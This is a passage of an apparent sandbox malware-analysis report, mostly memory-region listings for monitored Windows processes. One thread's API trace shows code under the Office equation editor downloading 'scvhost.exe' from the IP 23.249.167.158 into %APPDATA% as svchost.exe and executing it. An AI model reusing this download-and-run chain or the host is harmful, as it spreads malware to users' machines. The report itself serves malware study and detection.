mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 672 start_va = 0x75430000 end_va = 0x7543dfff entry_point = 0x75430000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 673 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 674 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 675 start_va = 0x2c70000 end_va = 0x2d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 676 start_va = 0x2d70000 end_va = 0x2e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 677 start_va = 0x2e70000 end_va = 0x2eeffff entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 678 start_va = 0x2ef0000 end_va = 0x2faffff entry_point = 0x2ef0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 679 start_va = 0x3010000 end_va = 0x304ffff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 680 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 681 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 682 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 683 start_va = 0x3050000 end_va = 0x397ffff entry_point = 0x3050000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 684 start_va = 0x75ac0000 end_va = 0x75bf5fff entry_point = 0x75ac0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 685 start_va = 0x77920000 end_va = 0x77a14fff entry_point = 0x77920000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 686 start_va = 0x767e0000 end_va = 0x769dafff entry_point = 0x767e0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 687 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 688 start_va = 0x77800000 end_va = 0x7780bfff entry_point = 0x77800000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 689 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 690 start_va = 0x75010000 end_va = 0x751adfff entry_point = 0x75010000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 691 start_va = 0x350000 end_va = 0x350fff entry_point = 0x350000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 692 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 693 start_va = 0x350000 end_va = 0x35bfff entry_point = 0x350000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 694 start_va = 0x3c0000 end_va = 0x3c7fff entry_point = 0x3c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 695 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x3d0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 696 start_va = 0x76450000 end_va = 0x76484fff entry_point = 0x76450000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 697 start_va = 0x77df0000 end_va = 0x77df5fff entry_point = 0x77df0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 698 start_va = 0x3980000 end_va = 0x3a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 699 start_va = 0x3a80000 end_va = 0x3c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 700 start_va = 0x753a0000 end_va = 0x753e3fff entry_point = 0x753a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 701 start_va = 0x3a80000 end_va = 0x3b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 702 start_va = 0x3c10000 end_va = 0x3c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 703 start_va = 0x75380000 end_va = 0x7539bfff entry_point = 0x75380000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 704 start_va = 0x75370000 end_va = 0x75376fff entry_point = 0x75370000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 705 start_va = 0x74fb0000 end_va = 0x75001fff entry_point = 0x74fb0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 706 start_va = 0x75350000 end_va = 0x75364fff entry_point = 0x75350000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 707 start_va = 0x74fa0000 end_va = 0x74facfff entry_point = 0x74fa0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 708 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 709 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 710 start_va = 0x880000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 711 start_va = 0x3c50000 end_va = 0x3d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 712 start_va = 0x3d50000 end_va = 0x3e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 713 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 714 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 715 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 716 start_va = 0x74f90000 end_va = 0x74f95fff entry_point = 0x74f90000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 717 start_va = 0x2580000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 718 start_va = 0x3e50000 end_va = 0x3f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 719 start_va = 0x74d10000 end_va = 0x74d4bfff entry_point = 0x74d10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 720 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 721 start_va = 0x74f80000 end_va = 0x74f84fff entry_point = 0x74f80000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 722 start_va = 0x75a00000 end_va = 0x75a02fff entry_point = 0x75a00000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 723 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 724 start_va = 0x74d00000 end_va = 0x74d0ffff entry_point = 0x74d00000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 725 start_va = 0x3f50000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 726 start_va = 0x3b20000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 727 start_va = 0x40f0000 end_va = 0x428ffff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 728 start_va = 0x74cf0000 end_va = 0x74cf5fff entry_point = 0x74cf0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 729 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 730 start_va = 0x2fb0000 end_va = 0x2feffff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 731 start_va = 0x3f50000 end_va = 0x404ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 732 start_va = 0x40e0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 733 start_va = 0x74c90000 end_va = 0x74ce9fff entry_point = 0x74c90000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 734 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 735 start_va = 0x74c80000 end_va = 0x74c87fff entry_point = 0x74c80000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 877 start_va = 0x25c0000 end_va = 0x25d0fff entry_point = 0x25c0000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 878 start_va = 0x3a80000 end_va = 0x3abffff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 879 start_va = 0x3ae0000 end_va = 0x3b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 880 start_va = 0x40f0000 end_va = 0x41effff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 881 start_va = 0x74c30000 end_va = 0x74c79fff entry_point = 0x74c30000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 882 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 883 start_va = 0x3b20000 end_va = 0x3b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 884 start_va = 0x3c00000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 885 start_va = 0x41f0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 886 start_va = 0x74bb0000 end_va = 0x74c27fff entry_point = 0x74bb0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 887 start_va = 0x4050000 end_va = 0x40d4fff entry_point = 0x4050000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 888 start_va = 0x74ba0000 end_va = 0x74ba8fff entry_point = 0x74ba0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 889 start_va = 0x745f0000 end_va = 0x74b9afff entry_point = 0x745f0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 890 start_va = 0x74020000 end_va = 0x745cafff entry_point = 0x74020000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 891 start_va = 0x74b40000 end_va = 0x74b9efff entry_point = 0x74b40000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 892 start_va = 0x42d0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 893 start_va = 0x3b20000 end_va = 0x3b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 894 start_va = 0x3b80000 end_va = 0x3b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 895 start_va = 0x43d0000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 896 start_va = 0x74a40000 end_va = 0x74b34fff entry_point = 0x74a40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 897 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 898 start_va = 0x8c0000 end_va = 0x8c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 899 start_va = 0x74a10000 end_va = 0x74a30fff entry_point = 0x74a10000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 900 start_va = 0x76530000 end_va = 0x76574fff entry_point = 0x76530000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 901 start_va = 0x25e0000 end_va = 0x25e3fff entry_point = 0x25e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 902 start_va = 0x2630000 end_va = 0x264ffff entry_point = 0x2630000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 903 start_va = 0x2650000 end_va = 0x2650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 904 start_va = 0x2ff0000 end_va = 0x2ff3fff entry_point = 0x2ff0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 905 start_va = 0x3b90000 end_va = 0x3bbffff entry_point = 0x3b90000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 906 start_va = 0x4050000 end_va = 0x40b5fff entry_point = 0x4050000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 907 start_va = 0x75f20000 end_va = 0x75f31fff entry_point = 0x75f20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 908 start_va = 0x76580000 end_va = 0x7671cfff entry_point = 0x76580000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 909 start_va = 0x77750000 end_va = 0x77776fff entry_point = 0x77750000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 910 start_va = 0x749c0000 end_va = 0x74a0bfff entry_point = 0x749c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 911 start_va = 0x74990000 end_va = 0x749bdfff entry_point = 0x74990000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Thread: id = 36 os_tid = 0xb54 [0131.246] GlobalLock (hMem=0x2e70074) returned 0x9758f0 [0131.246] GetProcAddress (hModule=0x76220000, lpProcName="ExpandEnvironmentStringsW") returned 0x76234173 [0131.246] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\svchost.exe", lpDst=0x18f088, nSize=0x104 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe") returned 0x2e [0131.246] LoadLibraryA (lpLibFileName="Urlmon") returned 0x75ac0000 [0134.312] GetProcAddress (hModule=0x75ac0000, lpProcName="URLDownloadToFileW") returned 0x75b566f6 [0134.583] URLDownloadToFileW (param_1=0x0, param_2="http://23.249.167.158/file/doc/scvhost.exe", param_3="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe"), param_4=0x0, param_5=0x0) returned 0x0 [0147.010] LoadLibraryA (lpLibFileName="Shell32") returned 0x76b00000 [0147.011] GetProcAddress (hModule=0x76b00000, lpProcName="ShellExecuteExW") returned 0x76b21e46 [0147.011] ShellExecuteExW (in: pExecInfo=0x18f18c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18f18c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0147.419] GetProcAddress (hModule=0x76220000, lpProcName="ExitProcess") returned 0x76237a10 [0147.419] ExitProcess (uExitCode=0x0) Thread: id = 37 os_tid = 0xb60 Thread: id = 38 os_tid = 0xb6c Thread: id = 39 os_tid = 0xb74 Thread: id = 40 os_tid = 0xb78 Thread: id = 41 os_tid = 0xb84 Thread: id = 42 os_tid = 0xb88 Thread: id = 43 os_tid = 0xb8c Thread: id = 44 os_tid = 0xb90 Thread: id = 64 os_tid = 0xb94 Thread: id = 65 os_tid = 0xbc8 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7c6f000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0xb50" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c3" [0xc000000f], "LOCAL" [0x7] Region: id = 736 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 737 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 738 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 739 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 740 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 741 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 742 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 743 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 744 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 745 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 746 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 747 start_va = 0x280000 end_va = 0x290fff entry_point = 0x280000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 748 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x2a0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 749 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 750 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 751 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 752 start_va = 0x3d0000 end_va = 0x48ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 753 start_va = 0x490000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 754 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 755 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 756 start_va = 0x560000 end_va = 0x6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 757 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 758 start_va = 0x880000 end_va = 0xc72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 759 start_va = 0xc90000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 760 start_va = 0xd20000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 761 start_va = 0xda0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 762 start_va = 0xe80000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 763 start_va = 0xf10000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 764 start_va = 0xfb0000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 765 start_va = 0x1030000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 766 start_va = 0x10c0000 end_va = 0x138efff entry_point = 0x10c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 767 start_va = 0x13c0000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 768 start_va = 0x1440000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 769 start_va = 0x1650000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 770 start_va = 0x17a0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 771 start_va = 0x1820000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 772 start_va = 0x18a0000 end_va = 0x195ffff entry_point = 0x18a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: 